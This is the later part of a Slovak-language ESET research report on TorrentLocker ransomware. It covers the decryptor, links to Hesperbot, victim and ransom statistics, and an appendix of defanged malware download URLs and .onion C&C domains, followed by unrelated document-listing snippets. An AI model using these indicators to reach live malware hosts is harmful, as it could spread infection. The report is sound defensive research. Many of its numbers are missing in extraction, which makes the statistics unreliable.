pravdepodobne pridaný, aby umožnil určité overenie kľúča AES a potvrdenie, že súbor bol skutočne zašifrovaný TorrentLockerom. Tento spôsob ponechania kľúča AES v zašifrovanom súbore umožňuje prevádzkovateľom TorrentLockera, príp. komukoľvek so súkromným kľúčom RSA, dešifrovať obsah súboru. Poskytuje spôsob na získanie kľúča AES dokonca aj v prípade zlyhania C&C servera. Tento súkromný kľúč je však v rukách páchateľov. Získanie tohto súkromného kľúča by umožnilo vytvorenie generického dešifrovacieho softvéru. 19

22 6. ANALÝZA DEŠIFROVACIEHO SOFTVÉRU Analytikom spoločnosti ESET sa podarilo analyzovať dešifrovací softvér predávaný gangom prostredníctvom prístupu na platobné stránky obetí, ktoré zaplatili za softvér (pozrite si časť Metodológia). Tento dešifrovací softvér nie je vôbec mätúci. Veľa kódu zdieľa so samotným ransomvérom. Zároveň pre potreby šifrovania používa LibTomCrypt. Obrázok č. 12: Snímka obrazovky dešifrovacieho softvéru. V rámci jednej kampane je kód vo vnútri dešifrovacieho softvéru rovnaký pre všetkých. Ako je možné vidieť na nasledujúcej snímke obrazovky, jediným rozdielom je 32-bajtový kľúč AES-256 použitý na dešifrovanie dokumentov. Obrázok č. 13. Kľúče AES nie sú jediným rozdielom v dešifrovacom softvéri, ktorý zločinci šíria. Keďže kľúč AES je jedinečný pre každú infekciu, nie je možné použiť rovnakú kópiu dešifrovacieho softvéru pre dva rozdielne infikované počítače. 20

23 7. PODOBNOSŤ S BANKOVÝM TRÓJSKYM KOŇOM HESPERBOT Hesperbot objavili analytici ESETu v roku Je to bankový trójsky kôň schopný injektovania javascriptu a HTML do webových stránok. Jeho hlavným cieľom je krádež bankových údajov. Obsahuje tiež komponent pre Android na zachytávanie jednorazových hesiel (OTP), ktoré používajú určité banky. Dokument o Hesperbote je k dispozícii online na našom blogu welivesecurity.com. Počas nášho vyšetrovania TorrentLockera sme zistili, že tieto dve hrozby sú veľmi podobné. V skutočnosti to vyzerá tak, že autorom a prevádzkovateľom je jedna a tá istá skupina. Okrem toho, že cieľom sú rovnaké krajiny (hlavne Turecko, Česká republika a Austrália), sú tu aj iné stopy, ktoré naznačujú, že oba spolu súvisia. 7.1 Podobnosť stránok určených na šírenie malvéru Webové stránky používané na šírenie Hesperbotu na začiatku roku 2014 boli podobné tým, ktoré na šírenie používa TorrentLocker. V marci toho roku, MRG Effitas [20] uverejnil blogový príspevok o stránke na stiahnutie s obrázkom CAPTCHA, používanej na šírenie Hesperbotu. Je veľmi nezvyčajné používať na šírenie malvéru stránku s obrázkom CAPTCHA. URL adresy tiež vykazujú určitý vzorec, v niektorých prípadoch končiaci na.php?id=[digits]. Distribuuje Hesperbot Distribuuje TorrentLocker Obrázok č. 14: Porovnanie URL adries stránok. V oboch prípadoch bol stiahnutý.zip súbor obsahujúci škodlivý spustiteľný súbor. Názov.zip súboru má rovnaký vzor: [word]_[digits].zip. Páchatelia tiež napodobňujú TTNet, obľúbenú telekomunikačnú stránku v oboch [19] prípadoch [Príloha A]. 7.2 Opätovné použitie C&C servera Vo svojom blogovom príspevku [20], MRG Effitas tiež zverejnil adresu C&C servera pre Hesperbot, updatesecurehost1.ru, ktorá je Čo je zaujímavé, táto IP adresa bola tiež použitá ako C&C server pre TorrentLocker v septembri Príklady obsahujú URL adresu s doménou nigerianpride.net, ktorou v tom čase bola

24 7.3 Cesta k súboru PDB V oboch skupinách malvéru, prvotné verzie ukazujú cestu k súboru PDB (Program Database, používa sa pre informácie o odstraňovaní porúch) po jeho rozbalení. Cestu k súboru PDB pre Hesperbot našiel Peter Kleissner a zverejnil ju na Twitter v novembri Cesta k PDB súboru pre modul procblock pre Hesperbot bola nasledujúca: X:\hesperus\solution\v3_pdf_err\output\mods\Release\procblock_mod_x86.pdb V auguste 2014 analytici ESETu skúmali vzorku, ktorá vykazovala veľmi podobnú cestu k súboru PDB. Táto vzorka obsahovala nasledujúcu cestu pre modul jadra TorrentLockera: X:\racketeer\solutions\new\output\Release\bin\rack-core.pdb Iné vzorky tiež vykazovali iný binárny kód nazvaný rack-dropper: X:\racketeer\solutions\new\output\Release\rack-dropper.pdb Prítomnosť toho, čo vyzerá ako projekty Visual Studio v koreni disku X, nie je ničím bežným. I keď je možné, že dvaja rozdielni autori malvéru použili rovnakú cestu, tieto zistenia predpokladajú, že obidva malvéry boli zostavené na rovnakom stroji. 22

25 8. ŠTATISTIKA Keď sme zistili, ako sa generujú používateľské kódy (pozrite si Generovanie identifikačného kódu obete), analytici ESETu dokázali vytiahnuť informácie o obetiach z C&C serverov TorrentLockera. 8.1 Metodológia Nižšie sú uvedené kroky, ktoré sme podnikli, aby sme získali platobné stránky z C&C serverov: 1. Poslanie požiadavky Získať stránku na výkupné do C&C servera spolu s menom náhodného počítača 1. Rozbalenie používateľského kódu zo stránky 1. Rozbalenie identifikácie používateľa z používateľského kódu 1. Žiadosť o všetky platobné stránky s identifikáciou používateľa nižšou ako tá, ktorú sme dostali Tento experiment prebehol 24. novembra Rozhodli sme sa použiť všetky domény.onion, ktoré sme našli na stránkach s výkupným. Spoločné použitie domény.onion a používateľského kódu je vlastne spôsob, akým prevádzkovateľ TorrentLockera dokáže jedinečne identifikovať svoje obete, takže to bol najlepší spôsob na získanie čo najlepšieho pokrytia. Tu je zoznam C&C serverov: Tabuľka č. 6. Zoznam serverov C&C kontaktovaných v rámci experimentu. Doména.onion 4ptyziqllh5iyhx4.onion tisoyhcp2y52ioyk.onion nne4b5ujqqedvrkh.onion Dátum prvého videnia 20. november november september 2014 Získaný používateľský kód Používateľský kód dekódovaný Base 36 3fcyy m8so bgaj2r erhitnwfvpgajfbu.onion 29. august 2014 Rovnaký výsledok ako nne4b5ujqqedvrkh.onion a5xpevkpcmfmnaew.onion 3v6e2oe5y5ruimpe.onion 18. november november fld mqxfz udm744mfh5wbwxye.onion 6. august 2014 Nefunkčná iet7v4dciocgxhdv.onion 31. júl 2014 Nefunkčná Identifikácia používateľa 8.2 Výsledky Analytici ESETu si vyžiadali celkom platobných stránok z 5 rozdielnych C&C serverov. Z tohto celkového počtu, stránok boli platné používateľské kódy vygenerované úspešným infikovaním s platobnými informáciami alebo prepojením na stiahnutie dešifrovacieho softvéru v prípade, že obeť zaplatila výkupné. Ostatné používateľské kódy mohli z databázy vymazať prevádzkovatelia, pretože sú príliš staré, alebo z dôvodu, že neboli výsledkom skutočného infikovania (napr. používateľské kódy vytvorené analytikom malvéru). Z celkového počtu obetí, 570 zaplatilo výkupné a dostalo odkaz na dešifrovací softvér. Inými slovami, 1,44 % infikovaných používateľov, ktorých sme identifikovali, zaplatilo kybernetickým 23

26 zločincom výkupné. 20 stránok tiež ukazuje, že bitcoiny boli odoslané ale prístup na dešifrovací softvér nebol poskytnutý z dôvodu, že nebola uhradená plná suma. Zaplatené Čiastočne zaplatené Nezaplatené Obrázok č. 15: Pomer obetí, ktoré kybernetickým zločincom zaplatili za dešifrovací softvér. Platobná stránka sa prispôsobuje krajine obeti. Jazyk, mena a tiež prepojenia na trh s bitcoinmi sú rozdielne. Boli zistené vzory na celkovo 13 rozdielnych krajín. V niektorých krajinách boli kampane na šírenie veľmi úspešné a v niektorých krajinách bolo zaznamenaných iba niekoľko infikovaní. Španielsko Rakúsko Neznáme Francúzsko Holandsko Turecko Nemecko Nový Zéland Veľká Británia Kanada Írsko Česká republika Austrália Taliansko Obrázok č. 16: Počet infekcií podľa krajín. 24

27 1 777 neznámych stránok je v anglickom jazyku a neobsahujú žiadne informácie špecifické pre určitú krajinu, týkajúce sa nákupu bitcoinov. Vyzerá to tak, že generická stránka, ktorá sa používa na šírenie, sa nezameriava cielene na určitú krajinu. Platobná stránka zobrazuje obeti dve rozdielne ceny: môžu zaplatiť buď polovičnú sumu v prípade, že je výkupné uhradené do určitého času, alebo plnú sumu, ak sa obeť rozhodne zaplatiť po uvedenom termíne. Doba platnosti tejto zľavy sa pohybuje medzi 2-4 dňami a pri každej kampani je iná. Plná suma výkupného, požadovaná na odšifrovanie súborov, sa pohybuje medzi 2,0264 BTC a 4,0810 BTC Suma sa zrejme mení v závislosti na hodnote bitcoinov v momente spúšťania kampane, príp. v závislosti na iných faktoroch. Zároveň sme si všimli, že kampaň, v rámci ktorej sa žiada výkupné, nie je vždy rovnaká. Tu napríklad uvádzame 10 po sebe idúcich infikovaní: Tabuľka č. 7. Podrobné údaje desiatich, po sebe idúcich platobných stránok, z jedného C&C servera. ID Krajina Výkupné (BTC) Výkupné (peniaze) i Turecko 2,8589 BTC 2599 TRY i+1 Turecko 1,9789 BTC 1799 TRY i+2 Turecko 2,4189 BTC 2199 TRY i+3 Turecko 2,8589 BTC 2599 TRY i+4 Turecko 1,9789 BTC 1799 TRY i+5 Turecko 2,4189 BTC 2199 TRY i+6 Turecko 2,8589 BTC 2599 TRY i+7 Turecko 1,9789 BTC 1799 TRY i+8 Turecko 2,4189 BTC 2199 TRY i+9 Turecko 2,8589 BTC 2599 TRY Je možné, že prevádzkovatelia TorrentLockera sa pokúšajú zistiť tú správnu sumu, ktorú si od obetí požadovať, aby maximalizovali svoj príjem. Pre všetkých obetí, ktoré výkupné neuhradili, je priemerná požadovaná suma 1,334 BTC v prípade zaplatenia v rámci zľavy, potom je cena 2,688 BTC. Je ťažké uviesť, kto zaplatil plnú sumu a kto zľavnenú (polovičnú) sumu. Z tohto dôvodu sme sa rozhodli použiť rozsah, aby sme dokázali kvantifikovať zisk páchateľov. Celková suma v bitcoinoch sa pohybuje v rozmedzí 760, ,76 BTC. Pri hodnote bitcoinu dňa 29. novembra 2014 (1 BTC = 384,94 dolára) to znamená, že svoje obete pripravili o sumu v rozmedzí dolárov. Platobné stránky nedávnych infikovaní obsahovali dobu, ktorá zostávala do vypršania zľavy, a zvýšenie ceny. Zistili sme, že bolo 2766 stránok, kde zostávajúci čas bol vyšší ako nula. Maximálny zostávajúci čas zo stránok bol takmer presne štyri dni. Bolo to pravdepodobne veľmi nedávne infikovanie a myslíme si, že je bezpečné predpokladať, že štyri dni je čas poskytnutý na zaplatenie polovičnej ceny. Na záver je možné uviesť, že týchto 2766 obetí bolo infikovaných medzi novembrom 2014, čo počas tohto obdobia predstavuje 691,5 infikovaní denne. TorrentLocker nahlasuje C&C serveru počet súborov, ktoré zašifroval. Táto informácia nám umožnila určiť celkový počet zašifrovaných súborov, ktorý ku 24. novembru 2014 predstavuje číslo až

28 9. ZÁVER Gang prevádzkujúci TorrentLocker šíri tento ransomvér minimálne od februára Tým, že obetiam zabránili prístup k ich dokumentom, získali neuveriteľné množstvo bitcoinov. Doteraz to vyzerá tak, že príslušné orgány nedokážu toto podnikanie zastaviť. Presunom z AES v režime CTR na AES v režime CBC podstatne sťažili dešifrovanie bez AES kľúča. Získanie súkromného kľúča RSA od prevádzkovateľov by predstavovalo získanie schopnosti rozbaliť AES z akéhokoľvek zašifrovaného súboru. Pomocou tejto informácie by bolo možné vytvoriť generický nástroj na dešifrovanie. Jedným spôsobom, ako vyliečiť Torrent Locker, je mať offline zálohu. TottentLocker nedokáže upravovať obsah súborov, ktoré nie sú pripojené k infikovanému zariadeniu. Je však potrebné uvedomiť si, že ak je vaša záloha permanentne pripojená k počítaču, alebo na sieťovom disku, ktorý je kedykoľvek pripojiteľný, malvér taktiež zakóduje jeho obsah. Stále je treba odpovedať na množstvo otázok týkajúcich sa toho, ako gang funguje v pozadí: Predáva niekto balíček Racketeer iným, ktorí prevádzkujú botnet, alebo oni sami sú autormi a sami ho aj prevádzkujú? Jedná sa o vedľajší projekt spájaný s autormi Hesperbotu? Získavajú peniaze obidva naraz alebo sa presunuli iba na TorrentLocker? Prináša tento šírený ransomvér viac zisku ako bankový trójsky kôň? 26

29 10. POĎAKOVANIE Ďakujeme Thomasovi Dupuyovi za jeho pomoc pri analýze TorrentLockera. 11. ODKAZY Blogové príspevky týkajúce sa TorrentLockera v chronologickom poradí [1] , Osman Pamuk, Emir Üner and Alican Akyo (TÜBİTAK BİLGEM), Kripto kilit yöntemini kullanan şantajcı zararlı yazılım, [2] , rebus, Sifreli Ransomware, [3] , samohtc, CAPTCHA protected malware downloader, emc.com/community/connect/rsaxchange/netwitness/blog/2014/03/25/captcha-protectedmalware-downloader [4] , Fred Touchette (App River), New CryptoLocker Has a Walkabout, [5] , Joseph Graziano (Symantec), Energy Bill Spam Campaign Serves Up New Crypto Malware, [6] , Michael Jenkin, Cryptolocker (Again, new and improved?), [7] , Ivo Ivanov (Vínsula), Analysis of CryptoLocker Racketeer spread through fake Energy Australia bills, [8] , Richard Hummel (isight Partners), Analysis of TorrentLocker A New Strain of Ransomware Using Components of CryptoLocker and CryptoWall, isightpartners.com/2014/08/analysis-torrentlocker-new-strain-malware-using-componentscryptolocker-cryptowall [9] , Taneli Kaivola, Patrik Nisén and Antti Nuopponen (Nixu), TorrentLocker Unlocked, [10] , Richard Hummel (isight Partners), TorrentLocker New Variant with New Encryption Observed in the Wild, [11] , Chris Mannon (Zscaler), Crypto-Ransomware Running Rampant, [12] , Paolo Dal Checco and Giuseppe Dezzani (Digital Forensics Bureau), TorrentLocker Enti Italiani sotto riscatto, [13] , Joost Bijl (Fox-IT), Update on the Torrentlocker ransomware, [14] , MailGuard, MailGuard Breaking IT News: Fake NSW Office of State Revenue Scam, [15] , Paul Ducklin, GATSO! Speed camera phish leads to CryptoLocker ransomware clone, [16] , Patrick, Crytolocker Ransomware Campaign - Oct/Nov 2014, 27

30 [17] , Osman Pamuk, Alican Akyol (TÜBİTAK BİLGEM), Güncel CryptoLocker Saldırısına Dikkat, [18] , Zemana, Dosyalarınızı şifreleyen telefon faturasına dikkat edin!, Blogové príspevky týkajúce sa Hesperbotu [19] , Emir Üner, Alican Akyol, Onur Samet Özer (TÜBİTAK BİLGEM), Fatura Zararlı Yazılım (DefRef) Analizi, [20] , Zoltan Balazs (MRG Effitas), Captcha protected malware, CryptoLocker [21] , Keith Jarvis (Dell SecureWorks), CryptoLocker Ransomware, [22] , Meaghan Molloy (FireEye), Operation Tovar: The Latest Attempt to Eliminate Key Botnets, 28

31 12.PRÍLOHY Príloha A: Snímky stránok s CAPTCHA, z ktorých sa sťahoval malvér Obrázok č. 17: DHL - Rakúsko a Nemecko. Obrázok č. 18: Office of State Revenue Austrália. 29

32 Obrázok č. 19: Auspost Austrália Obrázok č. 20: Česká pošta Česká republika. 30

33 Obrázok č. 21: TTNet Turecko. Obrázok č. 22: Royal Mail Veľká Británia. 31

34 Obrázok č. 23: SDA Taliansko. 32

35 Príloha B: Zoznam známych domén, na ktorých sa nachádza stránka, z ktorej sa stiahne malvér Zoznamy sú obmedzené na URL adresy pozorované v novembri Zátvorky ({}) označujú, že na danej stránke sa nachádzalo viacero názvov súborov. Možné názvy súborov sú oddelené čiarkami v zátvorkách. Stránky s odkazom na stiahnutie obsahujúce CAPTCHA hxxp://aupostal24.org hxxp://correos-online.org hxxp://cs-posta24.info hxxp://csposta24.org hxxp://efatura.ttnet-fatura.biz/ hxxp://efatura.ttnet-fatura.info/ hxxp://efatura.ttnetbilglendirme.com/ hxxp://mysda24.biz hxxp://mysda24.com Priame prepojenia na súbor.zip hxxp://0160d4a.netsolhost.com/responder.zip hxxp:// /{condition,details,payment,price}.zip hxxp://abaxsoftware.org/{condition,details,payment,pricelist}.zip hxxp://accessautoclass.com/processing.zip hxxp://ad-ep.com/{mensaje,perfil,responder}.zip hxxp://administ.hn02.wiroos.com/saldo.zip hxxp://agrofert.com.ar/invoice.zip hxxp://ameridev.com/informe.zip hxxp://animale.com/condition.zip hxxp://attorneyjacksonms.com/informe.zip hxxp://aurahearingaid.com/{account,payment}.zip hxxp://bariawilliamson.com/{informe,mensaje,perfil,responder}.zip hxxp://bbbjewelry.net/mensaje.zip hxxp://bedazzlememore.com/{informe,mensaje,responder}.zip hxxp://beepbike44.fr/{answer,contract,documentation,invoice,message}.zip hxxp://bharatvalley.com/account.zip hxxp://bigappleinfotech.com/processing.zip hxxp://canonistasargentina.com/info.zip hxxp://capitolpestcontrol.com/{mensaje,perfil}.zip hxxp://casadahospedagem.com.br/invoice.zip hxxp://centralapplianceservice.com/informe.zip hxxp://chapasyherrajesdelbajio.com.mx/invoice.zip hxxp://chli.ca/{answer,message}.zip hxxp://consultasas.com/perfil.zip hxxp://coolwatercatering.com/{mensaje,perfil}.zip hxxp://crm.opusestates.in/{account,invoice,payment}.zip hxxp://cybercountrysystems.com/{informe,perfil,responder}.zip hxxp://desingforbiosafety.com/processing.zip 33

36 hxxp://dipneo.com.ar/invoice.zip hxxp://docs.majesticcinemas.com.au/invoice.zip hxxp://doctoresarceo.com.mx/payment.zip hxxp://electriargo.mx/{info,processing}.zip hxxp://enginemanagementsystem.com/details.zip hxxp://englishdemo.emonkey.no/processing.zip hxxp://ever-move.be/{account,payment,transazione}.zip hxxp://fastweb011.net/{mensaje,responder}.zip hxxp://foresightinfra.com/account.zip hxxp://fromagerie-de-malataverne.fr/documentation.zip hxxp://golftoknow.com/{answer,contract,documentation,message}.zip hxxp://graniteunlimitedinc.com/processing.zip hxxp://gt1004.com/{documentation,invoice,message}.zip hxxp://helenannobil.com/fattura.zip hxxp://hellovizag.com/{contract,message}.zip hxxp://hostvip.com.br/answer.zip hxxp://htcladakh.com/info.zip hxxp://hukum.ub.ac.id/{info,processing}.zip hxxp://inegolbakkallarodasi.com/invoice.zip hxxp://ingentec.co.th/answer.zip hxxp://iplbiotech.com/{details,payment,pricelist}.zip hxxp://jjskin.kr/{condition,details,pricelist}.zip hxxp://jmlignon.o2switch.net/processing.zip hxxp://kafekaapeh.com/info.zip hxxp://kvak.cz/{info,processing}.zip hxxp://la.srv.br/{answer,message}.zip hxxp://laamigo.com/payment.zip hxxp://laanimatera.com.ar/{payment,price,pricelist}.zip hxxp://laflammedd.com/{informe,mensaje}.zip hxxp://lahatte.com/responder.zip hxxp://laislaconsultora.com.ar/info.zip hxxp://lencuthbert.com/responder.zip hxxp://littlebluechoo.com/{mensaje,perfil}.zip hxxp://mamchandschool.com/{account,invoice}.zip hxxp://mamhtroso.com/info.zip hxxp://merliasfalti.it/{info,invoice}.zip hxxp://messancy.com/{informe,perfil,responder}.zip hxxp://metrofinish.com/{account,info,invoice}.zip hxxp://midamdental.com/{payment,price,pricelist}.zip hxxp://msdisabilities.com/responder.zip hxxp://msrealestate.com/perfil.zip hxxp://mylowprice.net/contract.zip hxxp://mytraveladvisor.co.uk/{condition,details,payment,price}.zip hxxp://new-line.co.kr/{condition,details,payment,price}.zip hxxp://nicolesantivip.com/pricelist.zip hxxp://ninacucina.com/responder.zip 34

37 hxxp://odontoportes.com.br/{answer,contract}.zip hxxp://oelsmeier.homepage.t-online.de/informe.zip hxxp://orthoiris.com/perfil.zip hxxp://perthanddistrictpipeband.co.uk/{condition,price,pricelist}.zip hxxp://petitrenaud.net/payment.zip hxxp://placagesdebois.com/responder.zip hxxp://pousadapraiagrande.com/invoice.zip hxxp://priceskincareclinic.com/responder.zip hxxp://protecnicsrl.com/{answer,contract,documentation}.zip hxxp://rebatsystems.com/{informe,mensaje,responder}.zip hxxp://regallaboratories.com/{invoice,payment}.zip hxxp://regoshin.com/info.zip hxxp://rehabilitacionescampillo.com/contract.zip hxxp://robinsoncarneiro.com/{documentation,message}.zip hxxp://royalhandicraftindia.com/{contract,invoice}.zip hxxp://sereinesolutions.fr/{contract,message}.zip hxxp://shadesofaustralia.net.au/processing.zip hxxp://slass.org/{details,payment}.zip hxxp://solarseg.com.br/{answer,documentation}.zip hxxp://solutechnic.com/condition.zip hxxp://spellfresh.com.ar/pricelist.zip hxxp://ssuetcep.com/{mensaje,responder}.zip hxxp://ssumcba.org/{informe,perfil,responder}.zip hxxp://starnaweb.com.br/{details,price}.zip hxxp://stjosephfarmington.com/informe.zip hxxp://stoffels.be/condition.zip hxxp://talent-decoration.net/perfil.zip hxxp://tibo.andreka.be/mensaje.zip hxxp://tluaner.com/{answer,contract,invoice}.zip hxxp://totalitsolution.co/answer.zip hxxp://truehearted.co.uk/perfil.zip hxxp://turbul-montessori.fr/pricelist.zip hxxp://valledelzamudia.es/price.zip hxxp://valorpro.net/{account,invoice,payment}.zip hxxp://vault-dwellers.com/{informe,mensaje}.zip hxxp://vertvonlinebr.net/{payment,price}.zip hxxp://w3solutions.co.in/{condition,details}.zip hxxp://webtosta.com/{mensaje,perfil,responder}.zip hxxp://whitedayandblacknight.com/{details,payment,price}.zip hxxp://wulcon.com/{documentation,invoice}.zip hxxp:// hxxp:// hxxp:// hxxp:// hxxp:// 35

Français: Veuillez trouver l français G.I.R ci-joint dans le CD. Magyar: A magyar telepítési útmutató megtalálható a mellékelt CD-n

Français: Veuillez trouver l français G.I.R ci-joint dans le CD. Magyar: A magyar telepítési útmutató megtalálható a mellékelt CD-n Multi-Languages QIG on the CD =================================== Český: Českého průvodce rychlou instalací naleznete na přiloženém CD s ovladači Deutsch: Auf der beiliegend Treiber CD finden Sie deutsche

Detaylı

L 6027 FL SK PRÁČKA NÁVOD NA POUŽÍVANIE 2 TR ÇAMAŞIR MAKİNESİ KULLANMA KILAVUZU 31

L 6027 FL SK PRÁČKA NÁVOD NA POUŽÍVANIE 2 TR ÇAMAŞIR MAKİNESİ KULLANMA KILAVUZU 31 L 6027 FL SK PRÁČKA NÁVOD NA POUŽÍVANIE 2 TR ÇAMAŞIR MAKİNESİ KULLANMA KILAVUZU 31 2 www.aeg.com OBSAH 4 BEZPEČNOSTNÉ POKYNY 5 TEHNIČNE INFORMACIJE 6 POPIS VÝROBKU 6 PRÍSLUŠENSTVO 7 OVLÁDACÍ PANEL 10 PROGRAMY

Detaylı

EPIZÓDA ZO ŽIVOTA ZBERAČA ŽELEZA

EPIZÓDA ZO ŽIVOTA ZBERAČA ŽELEZA ATTILA MARCEL ATTILA MARCEL TRAGIKOMÉDIA FRANCÚZSKO 2013 102 MP 12 R + S: SYLVAIN CHOMET K: ANTOINE ROCH H: GUILLUAME GOUIX, ANNE LE NY, BERNADETTE LAFONT, HÉLÉNE VINCENT, LUIS REGO, FANNY TOURON A Ď.

Detaylı

Zararlı Kodlar& Analiz Temelleri ve Bir Saldırının Anatomisi

Zararlı Kodlar& Analiz Temelleri ve Bir Saldırının Anatomisi Zararlı Kodlar& Analiz Temelleri ve Bir Saldırının Anatomisi Page: 1 Ajanda Page: 2 Kaynaklar Page: 3 The Threat Ecosystem Page: 4 The Threat Ecosystem Page: 5 The Threat Ecosystem Page: 6 Slide 7 Page:

Detaylı

Windows Temelli Zararlı Yazılımlarla Mücadele

Windows Temelli Zararlı Yazılımlarla Mücadele Windows Temelli Zararlı Yazılımlarla Mücadele Zararlı Yazılım Analiz ve Mücadele Merkezi TÜBİTAK BİLGEM Siber Güvenlik Ens7tüsü Giriş Zararlı yazılımlar neden oldukları ekonomik zararlar nedeniyle önemli

Detaylı

Učiteľ chémie v-service Training Potreby v Turecku

Učiteľ chémie v-service Training Potreby v Turecku Učiteľ chémie v-service Training Potreby v Turecku Murat Demirbaş 1, Mustafa Bayrakci 2, Mehmet Polat Kalak 1 1 Kırıkkale University, Education Faculty, Turkey 2 Sakarya University, Education Faculty,

Detaylı

Information for users in the UK

Information for users in the UK LCD TV Information for users in the UK (Not applicable outside the UK) Positioning the TV For the best results, choose a position where light does not fall directly on the screen, and at some distance

Detaylı

İş E-Posta. E-Posta - Giriş. Son derece resmi, alıcının ismi yerine kullanılabilecek bir ünvanı var ise. Resmi, erkek alıcı, bilinmeyen isim

İş E-Posta. E-Posta - Giriş. Son derece resmi, alıcının ismi yerine kullanılabilecek bir ünvanı var ise. Resmi, erkek alıcı, bilinmeyen isim - Giriş Türkçe Çekçe Sayın Başkan, Vážený pane prezidente, Son derece resmi, alıcının ismi yerine kullanılabilecek bir ünvanı var ise Sayın yetkili, Resmi, erkek alıcı, bilinmeyen isim Sayın yetkili, Resmi,

Detaylı

LCD Digital Colour TV

LCD Digital Colour TV LCD Digital Colour TV Instrukce k Instalování konzoly pro montáž na zeď nejsou dodány jako oddelený návod s tímto televizorem. Tyto pokyny k instalaci jsou uvedeny v příručce k použití tohoto televizoru.

Detaylı

nezih@dagdeviren.av.tr Merkezi İşletim Sistemi (CPU): Hafıza: Anakart: Güç Kaynağı: Hard disk: İşletim Sistemi: Entegre Elektronik Sürücü Kontrolleri (IDE): Ses Kartı: Grafik Kartı: Portlar: Çevresel

Detaylı

Şekil 1- CryptoLocker Tarafından Kullanıcılara Gönderilen Eposta

Şekil 1- CryptoLocker Tarafından Kullanıcılara Gönderilen Eposta CryptoLocker Virüsü Nedir? Fidyeci (ransomware) truva atıdır [1]. Microsoft Windows işletim sistemlerini hedef alır. İnternet üzerinde ilk olarak 5 Eylül 2013 tarihinde görülmüştür [2]. CryptoLocker, virüslü

Detaylı

BTP 207 İNTERNET PROGRAMCILIĞI I. Ders 1

BTP 207 İNTERNET PROGRAMCILIĞI I. Ders 1 BTP 207 İNTERNET PROGRAMCILIĞI I Ders 1 2 Dersi Veren: Doç.Dr. Nuray At Mühendislik Fakültesi, Elektrik-Elektronik Müh. Bölümü, EEM213 e-mail: nat@anadolu.edu.tr Kaynaklar: 1. E. Yaşar, T. Özseven, İnternet

Detaylı

Simetrik (Gizli) Kriptografik Sistemler Blok Şifreler Standartlaştırma. DES-Data Encryption Standard (Bilgi Şifreleme Standardı)

Simetrik (Gizli) Kriptografik Sistemler Blok Şifreler Standartlaştırma. DES-Data Encryption Standard (Bilgi Şifreleme Standardı) Bilgi Güvenliği Simetrik (Gizli) Kriptografik Sistemler Blok Şifreler Standartlaştırma DES-Data Encryption Standard (Bilgi Şifreleme Standardı) Düzmetin (64 bit) Başlangıç Permütasyonu 58 50 42 34 26 18

Detaylı

Gelişmiş Siber Tehdidler (APT): Genel Bakış

Gelişmiş Siber Tehdidler (APT): Genel Bakış Gelişmiş Siber Tehdidler (APT): Genel Bakış Zararlı Yazılım Analiz ve Mücadele Merkezi TÜBİTAK BİLGEM Siber Güvenlik Enstitüsü Sunum İçeriği Gelişmiş Siber Tehdit (APT) nedir? APT savunma ve tespit yöntemleri

Detaylı

Dostali sme majstrov sveta!

Dostali sme majstrov sveta! Pondelok 24. 2. 2014 68. ročník číslo 45 cena 0,55 Denník Šport aj v App Store pre ipad a iphone NAJLEPŠIE KURZY SUPERŠANCA 1 X 2 14492 ČERNOMOREC CSKA SOFIA 7,50 4,20 1,50 16:30 14485 SPARTA PRAHA BRNO

Detaylı

Disk Alanı 100 Mb 1 000 Mb 3 000 Mb 5 000 Mb 10 000 Mb 15 000 Mb. Aylık Trafik (Bandwidth) 1 Gb 5 Gb 10 Gb 15 Gb 25 Gb 35 Gb

Disk Alanı 100 Mb 1 000 Mb 3 000 Mb 5 000 Mb 10 000 Mb 15 000 Mb. Aylık Trafik (Bandwidth) 1 Gb 5 Gb 10 Gb 15 Gb 25 Gb 35 Gb WINDOWS HOSTING PAKETLERİ (Plesk Panel) ÖZELLİKLER Platform Özellikleri Disk Alanı 100 Mb 1 000 Mb 3 000 Mb 5 000 Mb 10 000 Mb 15 000 Mb Aylık Trafik (Bandwidth) 1 Gb 5 Gb 10 Gb 15 Gb 25 Gb 35 Gb Windows

Detaylı

2. dönem itibariyle ben de Zararlı Yazılım Analizi 101 dersi vererek bu programa katkıda bulunacağım.

2. dönem itibariyle ben de Zararlı Yazılım Analizi 101 dersi vererek bu programa katkıda bulunacağım. Blog'um 4 Yaşında :) 19 Kasım 2009 tarihinde, Huzeyfe ÖNAL ın ısrarı üzerine (sağolsun) açmış olduğum blogum, bugün itibariyle 4. yılını doldurmuş bulunuyor. 4 yıl boyunca göstermiş olduğunuz ilgi, alaka,

Detaylı

WebSiteDefender ile Web Uygulama Güvenliği

WebSiteDefender ile Web Uygulama Güvenliği WebSiteDefender ile Web Uygulama Güvenliği Merhabalar. Bu makalemizde, Acunetix firması tarafından web uygulama güvenliği ve kötü amaçlı yazılımlardan korunmak için hazırlanmış olan Web Site Defender ı

Detaylı

Microsoft Office Macro Analysis

Microsoft Office Macro Analysis Microsoft Office Macro Analysis Some of you, who are the same age as me or older might remember the Melissa malware that spread through Microsoft Office Word macro in 1999 and affected millions of systems

Detaylı

Güncel CryptoLocker Saldırısına Dikkat

Güncel CryptoLocker Saldırısına Dikkat 1 / 16 2 / 16 Ülkemizdeki internet kullanıcılarını hedef alan KriptoKilit saldırıları daha önce de gerçekleşmişti. [1,2] Fakat açık uzantılara birbu şekilde sefer sahip KriptoKilit CryptoLocker dosyaları

Detaylı

TCP/IP. TCP (Transmission Control Protocol) Paketlerin iletimi. IP (Internet Protocol) Paketlerin yönlendirmesi TCP / IP

TCP/IP. TCP (Transmission Control Protocol) Paketlerin iletimi. IP (Internet Protocol) Paketlerin yönlendirmesi TCP / IP TCP/IP Protokolü TCP/IP TCP/IP nin tarihi ARPANET ile başlayan Internetin tarihidir. Adreslerin dağıtımı NIC (Network Information Center) tarafından yapılır. Türkiye de ise bunu ODTÜ-TUBİTAK yapmaktadır.

Detaylı

04/apríl GEOWorlD

04/apríl GEOWorlD 04/apríl 2014 GEOWorlD 1 Úvod 6 7-9 Islamské náboženstvo našimi očami.,,obrí národný park Sequoia. 10-11 12-13 Bosporský tunel a jeho strastiplná cesta. 2 Kde žijú porcelánové bábiky Ázie? 16-17 14-15

Detaylı

OBEE (Call Statistic Reporter)

OBEE (Call Statistic Reporter) İşletmelerdeki telefon santralleri üzerinden yapılan tüm telefon görüşmelerini otomatik olarak bilgisayar ortamına aktaran, ücretlendirilmesini (kontör ve /veya görüşme süresi ne göre) yapan ve istendiğinde

Detaylı

C# ile e-posta Göndermek

